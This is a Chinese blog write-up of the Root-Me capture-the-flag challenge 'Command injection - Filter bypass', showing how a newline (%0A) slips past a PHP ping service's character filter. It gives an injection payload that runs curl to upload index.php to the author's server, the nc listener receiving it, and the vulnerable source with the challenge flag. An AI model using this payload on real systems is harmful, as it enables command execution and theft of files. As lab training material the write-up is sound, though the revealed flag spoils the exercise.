码迷,mamicode.com
首页 > 其他好文 > 详细

Command injection - Filter bypass

时间:2019-12-28 13:03:36      阅读:105      评论:0      收藏:0      [点我收藏+]

标签:图片   dde   两种   isset   inject   submit   flag   receive   position   

Find a vulnerability in this service and exploit it. Some protections were added.
The flag is on the index.php file.

找到此服务中的漏洞并加以利用。增加了一些保护措施。该标志位于index.php文件中。

两种结果:
  ping ok
  技术图片

常用连接符:
  & 前面无论真假,都会执行后面
  && 前面为假,则不会执行后面语句
  | 无论真假都不会执行前面语句
  || 前面为真,则不会执行后面
以上无效 ,%0A 可用
  此处使用 sleep 60s 判断后面语句是否执行

使用curl读取index.php
  payload:ip=127.0.0.1%0acurl -F `filename=@index.php` *.*.*.*:9999   -------------------vps的ip地址

nc -lvvp 9999
  Listening on [0.0.0.0] (family 0, port 9999)
  Connection from challenge01.root-me.org 49010 received!
  POST / HTTP/1.1
  Host: *.*.*.*:9999 
  User-Agent: curl/7.47.0
  Accept: */*
  Content-Length: 1008
  Expect: 100-continue
  Content-Type: multipart/form-data; boundary=------------------------0fee3a45749c037a

  --------------------------0fee3a45749c037a
  Content-Disposition: form-data; name="filename"; filename="index.php"
  Content-Type: application/octet-stream

  <html>
  <head>
  <title>Ping Service</title>
  </head>
  <body>
  <form method="POST" action="index.php">
  <input type="text" name="ip" placeholder="127.0.0.1">
  <input type="submit">
  </form>
  <pre>
  <?php
  $flag = "Comma@nd_1nJec7ion_Fl@9_1337_Th3_G@m3!!!";

  if(isset($_POST["ip"]) && !empty($_POST["ip"])){
  $ip = @preg_replace("/[\\\$|`;&<>]/", "", $_POST["ip"]);
  $response = @shell_exec("timeout 5 bash -c ‘ping -c 3 ".$ip."‘");
  $receive = @preg_match("/3 packets transmitted, (.*) received/s",$response,$out);

  if ($out[1]=="3")
  {
  echo "Ping OK";
  }
  elseif ($out[1]=="0")
  {
  echo "Ping NOK";
  }
  else
  {
  echo "Syntax Error";
  }
  }
  ?>
  </pre>
  </body>
  </html>

Command injection - Filter bypass

标签:图片   dde   两种   isset   inject   submit   flag   receive   position   

原文地址:https://www.cnblogs.com/abbin-blog/p/12111302.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!